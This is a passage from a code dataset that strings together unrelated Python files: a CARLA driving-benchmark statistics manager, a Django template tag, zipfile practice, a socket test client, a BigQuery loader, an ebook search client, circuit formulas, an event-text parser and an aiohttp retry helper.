dist\n previous_location = location\n\n return route_length\n\n\nclass StatisticsManager(object):\n\n \"\"\"\n This is the statistics manager for the CARLA leaderboard.\n It gathers data at runtime via the scenario evaluation criteria.\n \"\"\"\n\n def __init__(self):\n self._master_scenario = None\n self._registry_route_records = []\n\n def resume(self, endpoint):\n data = fetch_dict(endpoint)\n\n if data and dictor(data, '_checkpoint.records'):\n records = data['_checkpoint']['records']\n\n for record in records:\n self._registry_route_records.append(to_route_record(record))\n\n def set_route(self, route_id, index):\n\n self._master_scenario = 
None\n route_record = RouteRecord()\n route_record.route_id = route_id\n route_record.index = index\n\n if index < len(self._registry_route_records):\n # the element already exists and therefore we update it\n self._registry_route_records[index] = route_record\n else:\n self._registry_route_records.append(route_record)\n\n def set_scenario(self, scenario):\n \"\"\"\n Sets the scenario from which the statistics will be taken.\n \n This works in conjunction with set_route so that the variable\n is only active when the simulation is active, to avoid statistic\n errors in case something breaks between simulations \n \"\"\"\n self._master_scenario = scenario\n\n def compute_route_statistics(self, config, duration_time_system=-1, duration_time_game=-1, failure=\"\"):\n \"\"\"\n Compute the current statistics by evaluating all relevant scenario criteria\n \"\"\"\n index = config.index\n\n if not self._registry_route_records or index >= len(self._registry_route_records):\n raise Exception('Critical error with the route registry.')\n\n # fetch latest record to fill in\n route_record = self._registry_route_records[index]\n\n target_reached = False\n score_penalty = 1.0\n score_route = 0.0\n driving_score = 0.0\n collisions_pedestrian = 0\n collisions_vehicle = 0\n collisions_layout = 0\n red_light = 0\n stop_infraction = 0\n outside_route_lanes = 0\n route_dev = 0\n route_timeout = 0\n vehicle_blocked = 0\n\n route_length = compute_route_length(config)\n\n route_record.meta['duration_system'] = duration_time_system\n route_record.meta['duration_game'] = duration_time_game\n route_record.meta['route_length'] = route_length\n\n if self._master_scenario:\n if self._master_scenario.timeout_node.timeout:\n route_record.infractions['route_timeout'].append('Route timeout.')\n failure = \"Agent timed out\"\n\n for node in self._master_scenario.get_criteria():\n if node.list_traffic_events:\n # analyze all traffic events\n for event in node.list_traffic_events:\n if event.get_type() == TrafficEventType.COLLISION_STATIC:\n score_penalty *= PENALTY_COLLISION_STATIC\n route_record.infractions['collisions_layout'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.COLLISION_PEDESTRIAN:\n score_penalty *= PENALTY_COLLISION_PEDESTRIAN\n route_record.infractions['collisions_pedestrian'].append(event.get_message())\n \n elif event.get_type() == TrafficEventType.COLLISION_VEHICLE:\n score_penalty *= PENALTY_COLLISION_VEHICLE\n route_record.infractions['collisions_vehicle'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.OUTSIDE_ROUTE_LANES_INFRACTION:\n score_penalty *= (1 - event.get_dict()['percentage'] / 100)\n route_record.infractions['outside_route_lanes'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.TRAFFIC_LIGHT_INFRACTION:\n score_penalty *= PENALTY_TRAFFIC_LIGHT\n route_record.infractions['red_light'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.ROUTE_DEVIATION:\n route_record.infractions['route_dev'].append(event.get_message())\n failure = \"Agent deviated from the route\"\n\n elif event.get_type() == TrafficEventType.STOP_INFRACTION:\n score_penalty *= PENALTY_STOP\n route_record.infractions['stop_infraction'].append(event.get_message())\n\n elif event.get_type() == TrafficEventType.VEHICLE_BLOCKED:\n route_record.infractions['vehicle_blocked'].append(event.get_message())\n failure = \"Agent got blocked\"\n\n elif event.get_type() == TrafficEventType.ROUTE_COMPLETED:\n score_route = 100.0\n 
target_reached = True\n                        elif event.get_type() == TrafficEventType.ROUTE_COMPLETION:\n                            if not target_reached:\n                                if event.get_dict():\n                                    score_route = event.get_dict()['route_completed']\n                                else:\n                                    score_route = 0\n\n        # update route scores\n        route_record.scores['score_route'] = score_route\n        route_record.scores['score_penalty'] = score_penalty\n        driving_score = max(score_route*score_penalty, 0.0)\n        route_record.scores['score_composed'] = driving_score\n\n        # update status\n        if target_reached:\n            route_record.status = 'Completed'\n        else:\n            route_record.status = 'Failed'\n            if failure:\n                route_record.status += ' - ' + failure\n\n        # Save results as .txt\n        now = datetime.now()\n        now = now.strftime(\"%Y-%m-%d\")\n        txt_file = \"/workspace/results/log_\" + now + \".txt\"\n        \n        output = \"\\n\\n\"\n        output += \"------------------------ROUTE_RECORD: -------------------------\\n\"\n        output += \"*** Route_id:\" + str(route_record.route_id) + \"\\n\"\n        output += \"*** Index:\" + str(route_record.index) + \"\\n\"\n        output += \"*** Status:\" + str(route_record.status) + \"\\n\"\n        output += \"*** Infractions:\" + str(route_record.infractions) + \"\\n\"\n        output += \"*** Scores:\" + str(route_record.scores) + \"\\n\"\n        output += \"*** Meta:\" + str(route_record.meta) + \"\\n\"\n        output += \"---------------------------------------------------------------\\n\"\n\n        with open(txt_file, \"a\") as file_object:\n            file_object.write(output)\n        \n        print(\"Saving statistics in: \", txt_file)\n\n        # Save results as .csv\n        \n        csv_file = \"/workspace/results/log_statistics_\" + now + \".csv\"\n        rows = []\n\n        total_rl = 0.0\n        total_ds = 0.0\n        total_rc = 0.0\n        total_ip = 0.0\n        total_cp = 0\n        total_cv = 0\n        total_cl = 0\n        total_rli = 0\n        total_ssi = 0\n        total_ori = 0\n        total_rd = 0\n        total_rt = 0\n        total_ab = 0\n        \n        try: \n            with open(csv_file, mode='r') as data:\n                csv_reader = csv.reader(data, delimiter = '\\t', lineterminator = '\\n')\n                # extracting field names through first row\n                fields_data = next(csv_reader)\n                if fields_data[0] != 'Id':\n                    print(f\"Error in {csv_file}: incorrect file format.\")\n                else:\n                    for row in csv_reader:\n                        if row[0] == '-': # Delimiter\n                            break\n                        else:\n                            rows.append(row)\n                            total_rl = total_rl + float(row[2])\n                            total_ds = total_ds + float(row[5])\n                            total_rc = total_rc + float(row[6])\n                            total_ip = total_ip + float(row[7])\n                            total_cp = total_cp + int(row[8])\n                            total_cv = total_cv + int(row[9])\n                            total_cl = total_cl + int(row[10])\n                            total_rli = total_rli + int(row[11])\n                            total_ssi = total_ssi + int(row[12])\n                            total_ori = total_ori + int(row[13])\n                            total_rd = total_rd + int(row[14])\n                            total_rt = total_rt + int(row[15])\n                            total_ab = total_ab + int(row[16])\n\n        except:\n            print(f\"{csv_file} file does not exist. 
Creating file.....\")\n\n id_actual = ''.join(filter(str.isdigit, route_record.route_id))\n\n n_data = (len(rows) + 1)\n \n route_length = float(\"{:.2f}\".format(route_length))\n\n duration_time_system = float(\"{:.2f}\".format(duration_time_system))\n duration_time_game = float(\"{:.2f}\".format(duration_time_game))\n driving_score = float(\"{:.3f}\".format(driving_score))\n score_route = float(\"{:.3f}\".format(score_route))\n score_penalty = float(\"{:.3f}\".format(score_penalty))\n\n average_ds = float(\"{:.3f}\".format((total_ds + driving_score) / n_data))\n average_rc = float(\"{:.3f}\".format((total_rc + score_route) / n_data))\n average_ip = float(\"{:.3f}\".format((total_ip + score_penalty) / n_data))\n\n total_rl = total_rl + route_length\n total_rl_kms = max(average_rc / 100 * total_rl / 1000.0, 0.001)\n\n collisions_pedestrian = len(route_record.infractions['collisions_pedestrian'])\n total_cp = float(\"{:.3f}\".format((total_cp + collisions_pedestrian)/total_rl_kms)) # infraction/km\n collisions_vehicle = len(route_record.infractions['collisions_vehicle'])\n total_cv = float(\"{:.3f}\".format((total_cv + collisions_vehicle)/total_rl_kms))\n collisions_layout = len(route_record.infractions['collisions_layout'])\n total_cl = float(\"{:.3f}\".format((total_cl + collisions_layout)/total_rl_kms))\n red_light = len(route_record.infractions['red_light'])\n total_rli = float(\"{:.3f}\".format((total_rli + red_light)/total_rl_kms))\n stop_infraction = len(route_record.infractions['stop_infraction'])\n total_ssi = float(\"{:.3f}\".format((total_ssi + stop_infraction)/total_rl_kms))\n outside_route_lanes = len(route_record.infractions['outside_route_lanes'])\n total_ori = float(\"{:.3f}\".format((total_ori + outside_route_lanes)/total_rl_kms))\n route_dev = len(route_record.infractions['route_dev'])\n total_rd = float(\"{:.3f}\".format((total_rd + route_dev)/total_rl_kms))\n route_timeout = len(route_record.infractions['route_timeout'])\n total_rt = float(\"{:.3f}\".format((total_rt + route_timeout)/total_rl_kms))\n vehicle_blocked = len(route_record.infractions['vehicle_blocked'])\n total_ab = float(\"{:.3f}\".format((total_ab + vehicle_blocked)/total_rl_kms))\n\n fields = ['Id', 'Town', 'RL', 'DST', 'DGT', 'DS', 'RC', 'IP', 'CP', 'CV', 'CL', 'RLI', 'SSI', 'ORI', 'RD', 'RT', 'AB']\n\n aux = [id_actual, config.town, str(route_length), str(duration_time_system), str(duration_time_game), str(driving_score), \n str(score_route), str(score_penalty), str(collisions_pedestrian), str(collisions_vehicle), str(collisions_layout),\n str(red_light), str(stop_infraction), str(outside_route_lanes), str(route_dev), str(route_timeout), str(vehicle_blocked)]\n rows.append(aux)\n aux = ['-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-', '-']\n rows.append(aux)\n aux = ['', '', '', '', '', str(average_ds), str(average_rc), str(average_ip), str(total_cp), str(total_cv), str(total_cl), \n str(total_rli), str(total_ssi), str(total_ori), str(total_rd), str(total_rt), str(total_ab)]\n rows.append(aux)\n\n with open(csv_file, mode='w') as data:\n csv_writer = csv.writer(data, delimiter = '\\t', lineterminator = '\\n')\n csv_writer.writerow(fields)\n csv_writer.writerows(rows)\n\n print(\"Saved statistics in: \", csv_file)\n\n return route_record\n\n def compute_global_statistics(self, total_routes):\n global_record = RouteRecord()\n global_record.route_id = -1\n global_record.index = -1\n global_record.status = 'Completed'\n global_record.scores_std_dev = RouteRecord().scores\n\n 
if self._registry_route_records:\n            for route_record in self._registry_route_records:\n                global_record.scores['score_route'] += route_record.scores['score_route']\n                global_record.scores['score_penalty'] += route_record.scores['score_penalty']\n                global_record.scores['score_composed'] += route_record.scores['score_composed']\n\n                for key in global_record.infractions.keys():\n                    route_length_kms = max(route_record.scores['score_route'] / 100 * route_record.meta['route_length'] / 1000.0, 0.001)\n                    if isinstance(global_record.infractions[key], list):\n                        global_record.infractions[key] = len(route_record.infractions[key]) / route_length_kms\n                    else:\n                        global_record.infractions[key] += len(route_record.infractions[key]) / route_length_kms\n\n                if route_record.status != 'Completed':\n                    global_record.status = 'Failed'\n                    if 'exceptions' not in global_record.meta:\n                        global_record.meta['exceptions'] = []\n                    global_record.meta['exceptions'].append((route_record.route_id,\n                                                             route_record.index,\n                                                             route_record.status))\n\n        for key in global_record.scores.keys():\n            global_record.scores[key] /= float(total_routes)\n\n        if total_routes == 1:\n            for key in global_record.scores_std_dev.keys():\n                global_record.scores_std_dev[key] = 'NaN'\n        else:\n            for route_record in self._registry_route_records:\n                for key in global_record.scores_std_dev.keys():\n                    global_record.scores_std_dev[key] += math.pow(route_record.scores[key] - global_record.scores[key], 2)\n\n            for key in global_record.scores_std_dev.keys():\n                global_record.scores_std_dev[key] = math.sqrt(global_record.scores_std_dev[key] / float(total_routes - 1))\n\n        # Save results as .txt\n        now = datetime.now()\n        now = now.strftime(\"%Y-%m-%d\")\n        txt_file = \"/workspace/results/log_\" + now + \".txt\"\n\n        output = \"\\n\\n\"\n        output += \"------------------------GLOBAL_ROUTE: -------------------------\\n\"\n        output += \"*** Route_id:\" + str(global_record.route_id) + \"\\n\"\n        output += \"*** Index:\" + str(global_record.index) + \"\\n\"\n        output += \"*** Status:\" + str(global_record.status) + \"\\n\"\n        output += \"*** Infractions:\" + str(global_record.infractions) + \"\\n\"\n        output += \"*** Scores:\" + str(global_record.scores) + \"\\n\"\n        output += \"*** Meta:\" + str(global_record.meta) + \"\\n\"\n        output += \"---------------------------------------------------------------\\n\"\n\n        with open(txt_file, \"a\") as file_object:\n            file_object.write(output)\n        \n        print(\"Saved global statistics in: \", txt_file)\n        \n        return global_record\n\n    @staticmethod\n    def save_record(route_record, index, endpoint):\n        data = fetch_dict(endpoint)\n        if not data:\n            data = create_default_json_msg()\n\n        stats_dict = route_record.__dict__\n        record_list = data['_checkpoint']['records']\n        if index > len(record_list):\n            print('Error! 
Not enough entries in the list')\n            sys.exit(-1)\n        elif index == len(record_list):\n            record_list.append(stats_dict)\n        else:\n            record_list[index] = stats_dict\n\n        save_dict(endpoint, data)\n\n    @staticmethod\n    def save_global_record(route_record, sensors, total_routes, endpoint):\n        data = fetch_dict(endpoint)\n        if not data:\n            data = create_default_json_msg()\n\n        stats_dict = route_record.__dict__\n        data['_checkpoint']['global_record'] = stats_dict\n        data['values'] = ['{:.3f}'.format(stats_dict['scores']['score_composed']),\n                          '{:.3f}'.format(stats_dict['scores']['score_route']),\n                          '{:.3f}'.format(stats_dict['scores']['score_penalty']),\n                          # infractions\n                          '{:.3f}'.format(stats_dict['infractions']['collisions_pedestrian']),\n                          '{:.3f}'.format(stats_dict['infractions']['collisions_vehicle']),\n                          '{:.3f}'.format(stats_dict['infractions']['collisions_layout']),\n                          '{:.3f}'.format(stats_dict['infractions']['red_light']),\n                          '{:.3f}'.format(stats_dict['infractions']['stop_infraction']),\n                          '{:.3f}'.format(stats_dict['infractions']['outside_route_lanes']),\n                          '{:.3f}'.format(stats_dict['infractions']['route_dev']),\n                          '{:.3f}'.format(stats_dict['infractions']['route_timeout']),\n                          '{:.3f}'.format(stats_dict['infractions']['vehicle_blocked'])\n                          ]\n\n        data['labels'] = ['Avg. driving score',\n                          'Avg. route completion',\n                          'Avg. infraction penalty',\n                          'Collisions with pedestrians',\n                          'Collisions with vehicles',\n                          'Collisions with layout',\n                          'Red lights infractions',\n                          'Stop sign infractions',\n                          'Off-road infractions',\n                          'Route deviations',\n                          'Route timeouts',\n                          'Agent blocked'\n                          ]\n\n        entry_status = \"Finished\"\n        eligible = True\n\n        route_records = data[\"_checkpoint\"][\"records\"]\n        progress = data[\"_checkpoint\"][\"progress\"]\n\n        if progress[1] != total_routes:\n            raise Exception('Critical error with the route registry.')\n\n        if len(route_records) != total_routes or progress[0] != progress[1]:\n            entry_status = \"Finished with missing data\"\n            eligible = False\n        else:\n            for route in route_records:\n                route_status = route[\"status\"]\n                if \"Agent\" in route_status:\n                    entry_status = \"Finished with agent errors\"\n                    break\n\n        data['entry_status'] = entry_status\n        data['eligible'] = eligible\n\n        save_dict(endpoint, data)\n\n    \n\n    @staticmethod\n    def save_sensors(sensors, endpoint):\n        data = fetch_dict(endpoint)\n        if not data:\n            data = create_default_json_msg()\n\n        if not data['sensors']:\n            data['sensors'] = sensors\n\n        save_dict(endpoint, data)\n\n    @staticmethod\n    def save_entry_status(entry_status, eligible, endpoint):\n        data = fetch_dict(endpoint)\n        if not data:\n            data = create_default_json_msg()\n\n        data['entry_status'] = entry_status\n        data['eligible'] = eligible\n        save_dict(endpoint, data)\n\n    @staticmethod\n    def clear_record(endpoint):\n        if not endpoint.startswith(('http:', 'https:', 'ftp:')):\n            with open(endpoint, 'w') as fd:\n                fd.truncate(0)\n","repo_name":"RobeSafe-UAH/CARLA_Leaderboard","sub_path":"routes_xml/utils/statistics_manager_robesafe.py","file_name":"statistics_manager_robesafe.py","file_ext":"py","file_size_in_byte":21887,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"8280047236","text":"from django import template\nfrom django.template.loader import render_to_string\n\nfrom page.models import Page\n\n\nregister = template.Library()\n\n\ndef navigation(parser, token):\n    return NavigationNode()\n\n\nclass NavigationNode(template.Node):\n\n    def render(self, context):\n        nav_pages = Page.pages.filter(menu=True).order_by(\"-weight\")\n        
rendered_template = render_to_string(\"nav.html\",\n {\"pages\": nav_pages})\n return rendered_template\n\nregister.tag(\"navigation\", navigation)\n","repo_name":"Karajlug/karajlug","sub_path":"page/templatetags/page_nav.py","file_name":"page_nav.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71742442088","text":"import shutil\nimport os\nimport send2trash\nimport zipfile\n\nos.chdir('C:\\\\')\n#shutil.copy('C:\\\\BnetLog.txt', 'C:\\\\delicious')\n#shutil.copy('C:\\\\BnetLog.txt', 'C:\\\\delicious\\spam.txt')\n\n# shutil.copytree('C:\\\\New folder', 'C:\\\\New folder backup')\n#\n# shutil.move('C:\\\\BnetLog.txt', 'C:\\\\New folder backup2')\n# shutil.move('C:\\\\New folder backup2', 'C:\\\\backup')\n\n# Permanently deleting files and folders\n#os.unlink('C:\\\\backup')\n#os.rmdir('C:\\\\New f')\n#shutil.rmtree('C:\\\\New folder')\nos.chdir('C:\\\\Users\\ogi-8\\Desktop\\PythonProjects')\nwith open('file.txt', 'a') as bacon_file:\n bacon_file.write('Bacon isn\\'t a vegetable.')\n\n\nsend2trash.send2trash('file.txt')\n#Walking a directory tree\n\n# Reading Zip Files\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nprint(example_zip.namelist())\n\nspam_info = example_zip.getinfo('toDo.py')\nprint(spam_info.file_size)\nprint(spam_info.compress_size)\n\nprint('Compressed file is {} smaller!'.format(round(spam_info.file_size / spam_info.compress_size, 2)))\nexample_zip.close()\n\n# Extracting from ZIP files\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nexample_zip.extractall('C:\\\\Users\\ogi-8\\Desktop\\PythonProjects\\ToDo2')\nexample_zip.close()\n\n\nexample_zip = zipfile.ZipFile('ToDoList.zip')\nexample_zip.extract('toDo.py')\nexample_zip.close()\n\n# Creating and adding to ZIP files\n\nnew_zip = zipfile.ZipFile('file.zip', 'w')\nnew_zip.write('git comments.txt', compress_type=zipfile.ZIP_DEFLATED)\nnew_zip.close()\n\nzip_file = zipfile.ZipFile('file.zip')\nzip_file.extract('git comments.txt', 'C:\\\\Users\\ogi-8')\nzip_file.close()\n","repo_name":"jakubfolta/AutomateTheBoringStuffWithPython","sub_path":"organizing_files.py","file_name":"organizing_files.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2241102259","text":"import socket\nimport sys\nimport random\n\nSERVER_HOST = \"129.80.111.96\"\nSERVER_PORT = 6969\n\nif len(sys.argv) != 2 or (sys.argv[1] != 'update' and sys.argv[1] != 'monitor'):\n\tprint(f\"usage: {sys.argv[0]} update | monitor\")\n\tprint(sys.argv)\n\tsys.exit(2)\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((SERVER_HOST, SERVER_PORT))\n\nif sys.argv[1] == \"update\":\n\t# read current\n\tcurrent = int.from_bytes(s.recv(1), 'big')\n\tprint(f\"current color is {current}\")\n\n\t# update...\n\tnewcolor = random.randint(1, 6)\n\tprint(f\"updating color to {newcolor}\")\n\ts.sendall(newcolor.to_bytes(1, 'big'))\n\n\t# read new color\n\tcurrent = int.from_bytes(s.recv(1), 'big')\n\tassert current == newcolor, \"new color does not match\"\n\n\ts.close()\n\tsys.exit(0)\n\nwhile True:\n\t# read whenever we can\n\trawdata = s.recv(1)\n\tif len(rawdata) == 0: break\n\tprint(f\"current color is {int.from_bytes(rawdata, 
'big')}\")\n","repo_name":"jaytlang/him","sub_path":"server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70737873128","text":"from datetime import datetime\n\nfrom google.cloud import bigquery\n\nDATASET = \"BingAds\"\n\n\ndef add_batched_at(rows: list[dict], schema: list[dict]):\n return (\n [\n {**row, \"_batched_at\": datetime.utcnow().isoformat(timespec=\"seconds\")}\n for row in rows\n ],\n [*schema, {\"name\": \"_batched_at\", \"type\": \"TIMESTAMP\"}],\n )\n\n\ndef load(table: str, schema: list[dict]):\n def _load(rows: list[dict]) -> int:\n if not rows:\n return 0\n\n client = bigquery.Client()\n\n _rows, _schema = add_batched_at(rows, schema)\n\n output_rows = (\n client.load_table_from_json(\n _rows,\n f\"{DATASET}.{table}\",\n job_config=bigquery.LoadJobConfig(\n schema=_schema,\n create_disposition=\"CREATE_IF_NEEDED\",\n write_disposition=\"WRITE_APPEND\",\n ),\n )\n .result()\n .output_rows\n )\n\n return output_rows\n\n return _load\n","repo_name":"hieumdd/excellize-bing-ads","sub_path":"db/bigquery.py","file_name":"bigquery.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1983198443","text":"import json\nimport pickle\nimport re\nfrom collections import defaultdict\nfrom typing import Any as NDArray\nfrom typing import Dict, List, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom tqdm import tqdm\nfrom transformers import AutoTokenizer\n\n\ndef generate(\n dataset: Dict,\n):\n tokenizer = AutoTokenizer.from_pretrained(\n \"cl-tohoku/bert-base-japanese-whole-word-masking\"\n )\n X = []\n Y = []\n Z = []\n X_sentence = []\n X_target_verb = []\n Y_ga = []\n Y_wo = []\n Y_ni = []\n loader = DatasetLoading()\n for x, y, z in loader.making_intra_datasets():\n ids, is_target_verb = x\n return samples\n\n\nclass DatasetLoading:\n def __init__(\n self,\n _datasets,\n media=[\"OC\", \"OY\", \"OW\", \"PB\", \"PM\", \"PN\"],\n ):\n self.media = media\n self.tokenizer = AutoTokenizer.from_pretrained(\n \"cl-tohoku/bert-base-japanese-whole-word-masking\"\n )\n\n def making_intra_datasets(self, datasets):\n for domain in self.media:\n print(f\"--- start loading {domain} ---\")\n for file in datasets.keys():\n if domain in file:\n df = datasets[file]\n for sentential_df in self._to_sentential_df(df):\n for x, y in self._df_to_intra_vector(sentential_df):\n yield x, y, file\n\n def _to_sentential_df(self, df):\n last_sentence_indices = df[\"is文末\"][df[\"is文末\"] == True].index\n start = 0\n for index in last_sentence_indices:\n end = index\n yield df.loc[start:end]\n start = index + 1\n\n def _case_id_to_index(self, df, case_id, case_type, is_intra):\n if (\n case_type == \"none\"\n or case_type == \"exoX\"\n or case_type == \"exo2\"\n or case_type == \"exo1\"\n ):\n return str((df[\"単語\"] == \"\").idxmax())\n elif is_intra and case_type == \"inter(zero)\":\n return str((df[\"単語\"] == \"\").idxmax())\n else:\n return str((df[\"id\"] == case_id).idxmax())\n\n def _df_to_intra_vector(self, df):\n token = df[\"単語\"].values\n ids = self.tokenizer.convert_tokens_to_ids(token)\n\n for index, row in df.iterrows():\n if row[\"verb_type\"] == \"noun\" or row[\"verb_type\"] == \"pred\":\n y = row.loc[[\"ga\", \"ga_type\", \"o\", \"o_type\", \"ni\", \"ni_type\"]].copy()\n cases = [\"ga\", \"o\", \"ni\"]\n for case in cases:\n case_types 
= y[f\"{case}_type\"].split(\",\")\n case_ids = y[f\"{case}\"].split(\",\")\n case_indices = []\n for case_type, case_id in zip(case_types, case_ids):\n case_index = self._case_id_to_index(\n df, case_id, case_type, True\n )\n case_indices.append(case_index)\n case_indices = \",\".join(case_indices)\n y[case] = case_indices\n is_target_verb = np.zeros_like(ids)\n is_target_verb[index] = 1\n x = (ids, is_target_verb)\n y = ()\n z = (token, row[\"verb_type\"])\n yield x, y, z\n","repo_name":"mzk622/BERT-for-PAS","sub_path":"src/datagenerator/bccwj_intra/v1.py","file_name":"v1.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42514057968","text":"import requests\nfrom ebooks.provider.ebook import Ebook\nfrom ebooks.provider.ebook_provider import EbookProvider\n\n\nclass WereadEbookProvider(EbookProvider):\n def __init__(self):\n self.url = 'https://weread.qq.com/web/search/global?' \\\n 'keyword={}&maxIdx={}&count=20'\n\n def get_ebooks(self, title, last_book_index, page_index):\n url = self.url.format(title, last_book_index)\n response = requests.get(url)\n\n if response.status_code != requests.codes.ok:\n raise Exception(response.text)\n\n body = response.json()\n books = body.get('books', [])\n ebooks = map(self.__convert_to_ebook, books)\n\n return list(filter(self.__is_valid_book, ebooks))\n\n def __convert_to_ebook(self, book):\n book_info = book.get('bookInfo')\n\n if book_info.get('format') != 'epub' or book_info.get('soldout') == 1:\n return None\n\n ebook = Ebook()\n ebook.title = book_info.get('title', '')\n ebook.author = book_info.get('author', '')\n ebook.price = book_info.get('price', 0.0)\n ebook.cover = book_info.get('cover', '')\n ebook.abstract = book_info.get('intro', '')\n\n return ebook\n\n def __is_valid_book(self, book):\n return book is not None\n","repo_name":"Frederick-S/ebooks-api","sub_path":"ebooks/provider/weread.py","file_name":"weread.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41076091498","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\n\nimport common_formulas as cf\n\ndef lumped_model_Z21_no_ind(omega, Cq1, Cc1, Cr, Lr, Cc2, Cq2):\n\n Zq1 = cf.Zcap(Cq1, omega)\n Zc1 = cf.Zcap(Cc1, omega)\n Zr = cf.Zres(Cr, Lr, omega)\n Zc2 = cf.Zcap(Cc2, omega)\n Zq2 = cf.Zcap(Cq2, omega)\n\n # All the following currents are scaled by V2\n Iq2 = 1/Zq2\n Vr = 1 + Iq2*Zc2\n Ir = Vr/Zr\n V1 = Vr + Zc1 * (Iq2+Ir)\n Iq1 = V1/Zq1\n\n # Z21 = V2/I1\n # See documentation for the derivation of this formula\n Z21 = 1/(Iq2 + Ir + Iq1)\n\n return Z21\n\"\"\"\nCq1 = 53.8e-15\nCc1 = 5.08e-15\nCq2 = 40.6e-15\nCc2 = 4.6e-15\n\nLq = 5.95e-9\n\nf1 = cf.omega_r(Cq1, Lq)/2/np.pi\nf2 = cf.omega_r(Cq2, Lq)/2/np.pi\n\nomega1 = f1*2*np.pi\nomega2 = f2*2*np.pi\n\n\nres_len = 2255e-6\nCr, Lr = cf.lumped_l_2_resonator_C_and_L(res_len)\n\nprint(np.abs(lumped_model_Z21_no_ind(omega1, Cq1, Cc1, Cr, Lr, Cc2, Cq2)))\n\nZ1 = lumped_model_Z21_no_ind(omega1, Cq1, Cc1, Cr, Lr, Cc2, Cq2)\nZ2 = lumped_model_Z21_no_ind(omega2, Cq1, Cc1, Cr, Lr, Cc2, Cq2)\n\n\nJ = cf.lumped_elements_j_formula(omega1, omega2, Z1, Z2, Lq, Lq)\n 
\nprint(J/2/np.pi/1e6)\n\"\"\"\n","repo_name":"qipe-nlab/coupled-transmission-line-utils","sub_path":"q_q/q_q_formulas.py","file_name":"q_q_formulas.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29640492581","text":"import sys\nsys.path.append('.')\nfrom models.__event import OfflineEvent\nfrom functions.event import get_address, get_time\n\ntext = \"\"\"时间:8月30日20:00\n地址:北京市东城区方家胡同野友趣\n简介:北京周赛\n\"\"\"\n\ndemo = \"\"\"标题:北京周赛 #61\n时间:8月30日 20:00\n地址:北京市东城区方家胡同xx号野友趣\n简介:北京周赛!晚上18:00开门,本周同时有双打,可以来玩。请尽量带setup!\n联系方式:微信xxxxx(加好友)/QQ群xxxx\n活动费用:购买饮料或任意食物\n报名方式:微信群内报名 / https://smash.gg/xxxxxx/register\n直播地址:暂无 / https://live.bilibili.com/xxxxx\n\"\"\"\n\n\ndef parser(text: str) -> OfflineEvent:\n    event = OfflineEvent()\n    lines = text.splitlines()\n\n    title = lines.pop(0)\n    if not title.startswith('标题:'):\n        raise ValueError('无法识别标题,请确认该行开头是否与示例保持一致')\n    event.title = title[3:]\n    if not event.title:\n        raise ValueError('请填写活动标题!')\n\n    start_time = lines.pop(0)\n    if not start_time.startswith('时间:'):\n        raise ValueError('无法识别时间,请确认该行开头是否与示例保持一致')\n    event.start = get_time(start_time[3:])\n    if not event.start:\n        raise ValueError('无法解析时间,请尝试以下格式:x月x日 xx:xx')\n\n    address = lines.pop(0)\n    if not address.startswith('地址:'):\n        raise ValueError('无法识别地址,请确认该行开头是否与示例保持一致')\n    event.address = get_address(address[3:])\n    if not event.address:\n        raise ValueError('无法解析地址,请尝试以下格式:北京市东城区方家胡同xx号野友趣')\n\n    info = lines.pop(0)\n    if not info.startswith('简介:'):\n        raise ValueError('无法识别简介,请确认该行开头是否与示例保持一致')\n    event.info = info[3:]\n\n    contact = lines.pop(0)\n    if not contact.startswith('联系方式:'):\n        raise ValueError('无法识别联系方式,请确认该行开头是否与示例保持一致')\n    event.contact = contact[5:]\n\n    fee = lines.pop(0)\n    if not fee.startswith('活动费用:'):\n        raise ValueError('无法识别活动费用,请确认该行开头是否与示例保持一致')\n    event.fee = fee[5:]\n\n    register = lines.pop(0)\n    if not register.startswith('报名方式:'):\n        raise ValueError('无法识别报名方式,请确认该行开头是否与示例保持一致')\n    event.register = register[5:]\n\n    live = lines.pop(0)\n    if not live.startswith('直播地址:'):\n        raise ValueError('无法识别直播地址,请确认该行开头是否与示例保持一致')\n    event.live = live[5:]\n\n    return event\n\n\nresult = parser(demo)\nprint(result.__dict__)\n","repo_name":"fi6/kaiheila-bot-up","sub_path":"test/event-info.py","file_name":"event-info.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74494522728","text":"import asyncio\n\nfrom aiohttp import (\n    ClientConnectionError,\n    ClientPayloadError,\n    ClientSession,\n    TraceConfig,\n)\nfrom aiohttp_retry import ExponentialRetry, RetryClient\n\nfrom .asyncio import RateLimiterMixin\nfrom .logging import get_logger\n\nlogger = get_logger()\n\n\nasync def on_request_end(session, context, params):\n    if params.response.ok:\n        return\n\n    logger.error(\n        (\n            f\"{params.response.status} {params.response.reason}: \"\n            f\"{params.method} {params.response.url}\"\n        ),\n    )\n\n\nasync def on_request_exception(session, context, params):\n    if isinstance(params.exception, asyncio.CancelledError):\n        return\n\n    